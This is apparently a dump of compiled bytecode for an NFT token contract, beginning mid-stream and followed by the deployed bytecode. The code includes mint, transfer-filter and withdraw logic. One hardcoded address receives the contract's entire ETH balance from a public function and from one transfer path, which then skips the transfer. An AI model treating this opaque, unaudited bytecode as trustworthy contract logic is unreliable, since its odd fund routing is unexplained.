ffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610abf57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610b05573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610c68573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b8d57610b888484846116d3565b610c74565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610bd6929190612546565b60206040518083038186803b158015610bee57600080fd5b505afa158015610c02573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c2691906122e5565b610c6757336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610c5e919061252b565b60405180910390fd5b5b610c738484846116d3565b5b50505050565b6000610c858261175d565b9050919050565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cf4576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600b5481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610d80906128c8565b80601f0160208091040260200160405190810160405280929190818152602001828054610dac906128c8565b8015610df95780601f10610dce57610100808354040283529160200191610df9565b820191906000526020600020905b815481529060010190602001808311610ddc57829003601f168201915b5050505050905090565b600a5481565b60095481610e15610819565b610e1f91906126c7565b1115610e2a57600080fd5b610e338161182b565b50565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610f40576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610eae929190612546565b60206040518083038186803b158015610ec657600080fd5b505afa158015610eda573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610efe91906122e5565b610f3f57806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610f36919061252b565b60405180910390fd5b5b610f4a8383611972565b505050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610fa957600080fd5b60095481610fb5610819565b610fbf91906126c7565b1115610fca57600080fd5b610fd48282611a7d565b5050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115611127573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561104c5761104785858585611a9b565b611134565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401611095929190612546565b60206040518083038186803b1580156110ad57600080fd5b505afa1580156110c1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110e591906122e5565b61112657336040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161111d919061252b565b60405180910390fd5b5b61113385858585611a9b565b5b5050505050565b606061114682611b0e565b60405160200161115691906124fe565b6040516020818303038152906040529050919050565b60095481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6000816112116113a9565b11158015611220575060005482105b801561125e575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061127082610c7a565b90508073ffffffffffffffffffffffffffffffffffffffff16611291611b67565b73ffffffffffffffffffffffffffffffffffffffff16146112f4576112bd816112b8611b67565b611172565b6112f3576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b60006113b98261175d565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611420576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061142c84611b6f565b91509150611442818761143d611b67565b611b96565b61148e5761145786611452611b67565b611172565b61148d576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614156114f5576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6115028686866001611bda565b801561150d57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154600101919050819055506115db856115b7888887611be0565b7c020000000000000000000000000000000000000000000000000000000017611c08565b600460008681526020019081526020016000208190555060007c020000000000000000000000000000000000000000000000000000000084161415611663576000600185019050600060046000838152602001908152602001600020541415611661576000548114611660578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46116cb8686866001611c33565b505050505050565b600047111561173c577317ebbfd03cba041bbda3ae61b5b4c3f3a545f28773ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611736573d6000803e3d6000fd5b50611758565b61175783838360405180602001604052806000815250610fd8565b5b505050565b6000808290508061176c6113a9565b116117f4576000548110156117f35760006004600083815260200190815260200160002054905060007c0100000000000000000000000000000000000000000000000000000000821614156117f1575b60008114156117e75760046000836001900393508381526020019081526020016000205490506117bc565b8092505050611826565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b60003414156119405760018114801561185d5750611847611c39565b600e600043815260200190815260200160002054105b80156118a95750600b54600d60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b6118b257600080fd5b600d60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154809291906119029061292b565b9190505550600e6000438152602001908152602001600020600081548092919061192b9061292b565b919050555061193b336001611a7d565b61196f565b600c5481111561194f57600080fd5b600a548161195d919061274e565b341061196e5761196d3382611a7d565b5b5b50565b806007600061197f611b67565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611a2c611b67565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611a7191906125bb565b60405180910390a35050565b611a97828260405180602001604052806000815250611c61565b5050565b611aa6848484610830565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611b0857611ad184848484611cfe565b611b07576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060a060405101806040526020810391506000825281835b600115611b5257600184039350600a81066030018453600a8104905080611b4d57611b52565b611b27565b50828103602084039350808452505050919050565b600033905090565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611bf7868684611e5e565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b50505050565b6000600c611c45610819565b600954611c5291906127a8565b611c5c919061271d565b905090565b611c6b8383611e67565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611cf957600080549050600083820390505b611cab6000868380600101945086611cfe565b611ce1576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611c98578160005414611cf657600080fd5b50505b505050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611d24611b67565b8786866040518563ffffffff1660e01b8152600401611d46949392919061256f565b602060405180830381600087803b158015611d6057600080fd5b505af1925050508015611d9157506040513d601f19601f82011682018060405250810190611d8e919061233f565b60015b611e0b573d8060008114611dc1576040519150601f19603f3d011682016040523d82523d6000602084013e611dc6565b606091505b50600081511415611e03576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b60009392505050565b6000805490506000821415611ea8576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b611eb56000848385611bda565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550611f2c83611f1d6000866000611be0565b611f2685612024565b17611c08565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b818114611fcd57808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600181019050611f92565b506000821415612009576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b80600081905550505061201f6000848385611c33565b505050565b60006001821460e11b9050919050565b600061204761204284612653565b61262e565b90508281526020810184848401111561206357612062612a35565b5b61206e848285612886565b509392505050565b60008135905061208581612af3565b92915050565b60008135905061209a81612b0a565b92915050565b6000815190506120af81612b0a565b92915050565b6000813590506120c481612b21565b92915050565b6000815190506120d981612b21565b92915050565b600082601f8301126120f4576120f3612a30565b5b8135612104848260208601612034565b91505092915050565b60008135905061211c81612b38565b92915050565b60006020828403121561213857612137612a3f565b5b600061214684828501612076565b91505092915050565b6000806040838503121561216657612165612a3f565b5b600061217485828601612076565b925050602061218585828601612076565b9150509250929050565b6000806000606084860312156121a8576121a7612a3f565b5b60006121b686828701612076565b93505060206121c786828701612076565b92505060406121d88682870161210d565b9150509250925092565b600080600080608085870312156121fc576121fb612a3f565b5b600061220a87828801612076565b945050602061221b87828801612076565b935050604061222c8782880161210d565b925050606085013567ffffffffffffffff81111561224d5761224c612a3a565b5b612259878288016120df565b91505092959194509250565b6000806040838503121561227c5761227b612a3f565b5b600061228a85828601612076565b925050602061229b8582860161208b565b9150509250929050565b600080604083850312156122bc576122bb612a3f565b5b60006122ca85828601612076565b92505060206122db8582860161210d565b9150509250929050565b6000602082840312156122fb576122fa612a3f565b5b6000612309848285016120a0565b91505092915050565b60006020828403121561232857612327612a3f565b5b6000612336848285016120b5565b91505092915050565b60006020828403121561235557612354612a3f565b5b6000612363848285016120ca565b91505092915050565b60006020828403121561238257612381612a3f565b5b60006123908482850161210d565b91505092915050565b600080604083850312156123b0576123af612a3f565b5b60006123be8582860161210d565b92505060206123cf8582860161210d565b9150509250929050565b6123e2816127dc565b82525050565b6123f1816127ee565b82525050565b600061240282612684565b61240c818561269a565b935061241c818560208601612895565b61242581612a44565b840191505092915050565b61243981612850565b82525050565b600061244a8261268f565b61245481856126ab565b9350612464818560208601612895565b61246d81612a44565b840191505092915050565b60006124838261268f565b61248d81856126bc565b935061249d818560208601612895565b80840191505092915050565b60006124b66005836126bc565b91506124c182612a55565b600582019050919050565b60006124d96043836126bc565b91506124e482612a7e565b604382019050919050565b6124f881612846565b82525050565b6000612509826124cc565b91506125158284612478565b9150612520826124a9565b915081905092915050565b600060208201905061254060008301846123d9565b92915050565b600060408201905061255b60008301856123d9565b61256860208301846123d9565b9392505050565b600060808201905061258460008301876123d9565b61259160208301866123d9565b61259e60408301856124ef565b81810360608301526125b081846123f7565b905095945050505050565b60006020820190506125d060008301846123e8565b92915050565b60006020820190506125eb6000830184612430565b92915050565b6000602082019050818103600083015261260b818461243f565b905092915050565b600060208201905061262860008301846124ef565b92915050565b6000612638612649565b905061264482826128fa565b919050565b6000604051905090565b600067ffffffffffffffff82111561266e5761266d612a01565b5b61267782612a44565b9050602081019050919050565b600081519050919050565b600081519050919050565b600082825260208201905092915050565b600082825260208201905092915050565b600081905092915050565b60006126d282612846565b91506126dd83612846565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561271257612711612974565b5b828201905092915050565b600061272882612846565b915061273383612846565b925082612743576127426129a3565b5b828204905092915050565b600061275982612846565b915061276483612846565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561279d5761279c612974565b5b828202905092915050565b60006127b382612846565b91506127be83612846565b9250828210156127d1576127d0612974565b5b828203905092915050565b60006127e782612826565b9050919050565b60008115159050919050565b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600061285b82612862565b9050919050565b600061286d82612874565b9050919050565b600061287f82612826565b9050919050565b82818337600083830152505050565b60005b838110156128b3578082015181840152602081019050612898565b838111156128c2576000848401525b50505050565b600060028204905060018216806128e057607f821691505b602082108114156128f4576128f36129d2565b5b50919050565b61290382612a44565b810181811067ffffffffffffffff8211171561292257612921612a01565b5b80604052505050565b600061293682612846565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82141561296957612968612974565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f2e6a736f6e000000000000000000000000000000000000000000000000000000600082015250565b7f697066733a2f2f6261667962656962647862627a34346b6f6b70676d3563633360008201527f79736d70706c366573656169753364677869616a6a366d6e776e7276706f376360208201527f65712f0000000000000000000000000000000000000000000000000000000000604082015250565b612afc816127dc565b8114612b0757600080fd5b50565b612b13816127ee565b8114612b1e57600080fd5b50565b612b2a816127fa565b8114612b3557600080fd5b50565b612b4181612846565b8114612b4c57600080fd5b5056fea264697066735822122078074314ff3cbfda35f1db5ab2d02123ef45768b3c7c9d00a11730e6de11ad0e64736f6c63430008070033

Deployed Bytecode

0x60806040526004361061014b5760003560e01c806370a08231116100b6578063a22cb4651161006f578063a22cb4651461044a578063aa35cca314610473578063b88d4fde1461049c578063c87b56dd146104b8578063d5abeb01146104f5578063e985e9c5146105205761014b565b806370a08231146103455780637f942b5f146103825780638da5cb5b146103ad57806395d89b41146103d8578063a035b1fe14610403578063a0712d681461042e5761014b565b806338b08fd41161010857806338b08fd4146102585780633a233f89146102815780633ccfd60b146102aa57806341f43434146102c157806342842e0e146102ec5780636352211e146103085761014b565b806301ffc9a71461015057806306fdde031461018d578063081812fc146101b8578063095ea7b3146101f557806318160ddd1461021157806323b872dd1461023c575b600080fd5b34801561015c57600080fd5b5061017760048036038101906101729190612312565b61055d565b60405161018491906125bb565b60405180910390f35b34801561019957600080fd5b506101a26105ef565b6040516101af91906125f1565b60405180910390f35b3480156101c457600080fd5b506101df60048036038101906101da919061236c565b610681565b6040516101ec919061252b565b60405180910390f35b61020f600480360381019061020a91906122a5565b610700565b005b34801561021d57600080fd5b50610226610819565b6040516102339190612613565b60405180910390f35b6102566004803603810190610251919061218f565b610830565b005b34801561026457600080fd5b5061027f600480360381019061027a9190612399565b610990565b005b34801561028d57600080fd5b506102a860048036038101906102a3919061214f565b6109fc565b005b3480156102b657600080fd5b506102bf610a65565b005b3480156102cd57600080fd5b506102d6610b08565b6040516102e391906125d6565b60405180910390f35b6103066004803603810190610301919061218f565b610b1a565b005b34801561031457600080fd5b5061032f600480360381019061032a919061236c565b610c7a565b60405161033c919061252b565b60405180910390f35b34801561035157600080fd5b5061036c60048036038101906103679190612122565b610c8c565b6040516103799190612613565b60405180910390f35b34801561038e57600080fd5b50610397610d45565b6040516103a49190612613565b60405180910390f35b3480156103b957600080fd5b506103c2610d4b565b6040516103cf919061252b565b60405180910390f35b3480156103e457600080fd5b506103ed610d71565b6040516103fa91906125f1565b60405180910390f35b34801561040f57600080fd5b50610418610e03565b6040516104259190612613565b60405180910390f35b6104486004803603810190610443919061236c565b610e09565b005b34801561045657600080fd5b50610471600480360381019061046c9190612265565b610e36565b005b34801561047f57600080fd5b5061049a600480360381019061049591906122a5565b610f4f565b005b6104b660048036038101906104b191906121e2565b610fd8565b005b3480156104c457600080fd5b506104df60048036038101906104da919061236c565b61113b565b6040516104ec91906125f1565b60405180910390f35b34801561050157600080fd5b5061050a61116c565b6040516105179190612613565b60405180910390f35b34801561052c57600080fd5b506105476004803603810190610542919061214f565b611172565b60405161055491906125bb565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806105b857506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806105e85750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b6060600280546105fe906128c8565b80601f016020809104026020016040519081016040528092919081815260200182805461062a906128c8565b80156106775780601f1061064c57610100808354040283529160200191610677565b820191906000526020600020905b81548152906001019060200180831161065a57829003601f168201915b5050505050905090565b600061068c82611206565b6106c2576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561080a576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610778929190612546565b60206040518083038186803b15801561079057600080fd5b505afa1580156107a4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107c891906122e5565b61080957806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610800919061252b565b60405180910390fd5b5b6108148383611265565b505050565b60006108236113a9565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561097e573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156108a35761089e8484846113ae565b61098a565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016108ec929190612546565b60206040518083038186803b15801561090457600080fd5b505afa158015610918573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061093c91906122e5565b61097d57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610974919061252b565b60405180910390fd5b5b6109898484846113ae565b5b50505050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146109ea57600080fd5b81600b81905550806009819055505050565b6000471115610a61577317ebbfd03cba041bbda3ae61b5b4c3f3a545f28773ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610a5f573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610abf57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610b05573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610c68573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610b8d57610b888484846116d3565b610c74565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610bd6929190612546565b60206040518083038186803b158015610bee57600080fd5b505afa158015610c02573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c2691906122e5565b610c6757336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610c5e919061252b565b60405180910390fd5b5b610c738484846116d3565b5b50505050565b6000610c858261175d565b9050919050565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cf4576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600b5481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610d80906128c8565b80601f0160208091040260200160405190810160405280929190818152602001828054610dac906128c8565b8015610df95780601f10610dce57610100808354040283529160200191610df9565b820191906000526020600020905b815481529060010190602001808311610ddc57829003601f168201915b5050505050905090565b600a5481565b60095481610e15610819565b610e1f91906126c7565b1115610e2a57600080fd5b610e338161182b565b50565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610f40576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610eae929190612546565b60206040518083038186803b158015610ec657600080fd5b505afa158015610eda573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610efe91906122e5565b610f3f57806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610f36919061252b565b60405180910390fd5b5b610f4a8383611972565b505050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610fa957600080fd5b60095481610fb5610819565b610fbf91906126c7565b1115610fca57600080fd5b610fd48282611a7d565b5050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115611127573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561104c5761104785858585611a9b565b611134565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401611095929190612546565b60206040518083038186803b1580156110ad57600080fd5b505afa1580156110c1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110e591906122e5565b61112657336040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161111d919061252b565b60405180910390fd5b5b61113385858585611a9b565b5b5050505050565b606061114682611b0e565b60405160200161115691906124fe565b6040516020818303038152906040529050919050565b60095481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6000816112116113a9565b11158015611220575060005482105b801561125e575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061127082610c7a565b90508073ffffffffffffffffffffffffffffffffffffffff16611291611b67565b73ffffffffffffffffffffffffffffffffffffffff16146112f4576112bd816112b8611b67565b611172565b6112f3576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b60006113b98261175d565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614611420576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061142c84611b6f565b91509150611442818761143d611b67565b611b96565b61148e5761145786611452611b67565b611172565b61148d576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614156114f5576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6115028686866001611bda565b801561150d57600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154600101919050819055506115db856115b7888887611be0565b7c020000000000000000000000000000000000000000000000000000000017611c08565b600460008681526020019081526020016000208190555060007c020000000000000000000000000000000000000000000000000000000084161415611663576000600185019050600060046000838152602001908152602001600020541415611661576000548114611660578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46116cb8686866001611c33565b505050505050565b600047111561173c577317ebbfd03cba041bbda3ae61b5b4c3f3a545f28773ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611736573d6000803e3d6000fd5b50611758565b61175783838360405180602001604052806000815250610fd8565b5b505050565b6000808290508061176c6113a9565b116117f4576000548110156117f35760006004600083815260200190815260200160002054905060007c0100000000000000000000000000000000000000000000000000000000821614156117f1575b60008114156117e75760046000836001900393508381526020019081526020016000205490506117bc565b8092505050611826565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b60003414156119405760018114801561185d5750611847611c39565b600e600043815260200190815260200160002054105b80156118a95750600b54600d60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b6118b257600080fd5b600d60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154809291906119029061292b565b9190505550600e6000438152602001908152602001600020600081548092919061192b9061292b565b919050555061193b336001611a7d565b61196f565b600c5481111561194f57600080fd5b600a548161195d919061274e565b341061196e5761196d3382611a7d565b5b5b50565b806007600061197f611b67565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611a2c611b67565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611a7191906125bb565b60405180910390a35050565b611a97828260405180602001604052806000815250611c61565b5050565b611aa6848484610830565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611b0857611ad184848484611cfe565b611b07576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060a060405101806040526020810391506000825281835b600115611b5257600184039350600a81066030018453600a8104905080611b4d57611b52565b611b27565b50828103602084039350808452505050919050565b600033905090565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611bf7868684611e5e565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b50505050565b6000600c611c45610819565b600954611c5291906127a8565b611c5c919061271d565b905090565b611c6b8383611e67565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611cf957600080549050600083820390505b611cab6000868380600101945086611cfe565b611ce1576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611c98578160005414611cf657600080fd5b50505b505050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611d24611b67565b8786866040518563ffffffff1660e01b8152600401611d46949392919061256f565b602060405180830381600087803b158015611d6057600080fd5b505af1925050508015611d9157506040513d601f19601f82011682018060405250810190611d8e919061233f565b60015b611e0b573d8060008114611dc1576040519150601f19603f3d011682016040523d82523d6000602084013e611dc6565b606091505b50600081511415611e03576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b60009392505050565b6000805490506000821415611ea8576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b611eb56000848385611bda565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550611f2c83611f1d6000866000611be0565b611f2685612024565b17611c08565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b818114611fcd57808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600181019050611f92565b506000821415612009576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b80600081905550505061201f6000848385611c33565b505050565b600060018